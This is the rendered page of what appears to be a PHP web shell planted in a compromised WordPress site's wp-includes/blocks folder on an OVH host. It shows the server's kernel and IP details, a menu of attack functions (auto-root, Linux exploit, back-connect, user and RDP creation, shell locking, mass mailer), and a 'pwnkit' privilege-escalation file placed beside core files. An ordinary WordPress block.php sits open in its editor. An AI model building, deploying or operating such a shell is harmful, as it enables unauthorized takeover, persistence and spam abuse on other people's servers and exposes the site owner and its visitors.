Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.217.99
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
adelcya /
wp-includes /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw----r--
archives.php
3.21
KB
-rw-r--r--
block.php
1006
B
-rw-r--r--
calendar.php
2.02
KB
-rw-r--r--
categories.php
3.01
KB
-rw-r--r--
latest-comments.php
5.62
KB
-rw-r--r--
latest-posts.php
4.98
KB
-rw-r--r--
pwnkit
0
B
-rwx---r-x
rss.php
4.38
KB
-rw-r--r--
search.php
2.14
KB
-rw-r--r--
shortcode.php
794
B
-rw-r--r--
tag-cloud.php
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block.php
<?php /** * Server-side rendering of the `core/block` block. * * @package WordPress */ /** * Renders the `core/block` block on server. * * @param array $attributes The block attributes. * * @return string Rendered HTML of the referenced block. */ function render_block_core_block( $attributes ) { if ( empty( $attributes['ref'] ) ) { return ''; } $reusable_block = get_post( $attributes['ref'] ); if ( ! $reusable_block || 'wp_block' !== $reusable_block->post_type ) { return ''; } if ( 'publish' !== $reusable_block->post_status || ! empty( $reusable_block->post_password ) ) { return ''; } return do_blocks( $reusable_block->post_content ); } /** * Registers the `core/block` block. */ function register_block_core_block() { register_block_type( 'core/block', array( 'attributes' => array( 'ref' => array( 'type' => 'number', ), ), 'render_callback' => 'render_block_core_block', ) ); } add_action( 'init', 'register_block_core_block' );
Close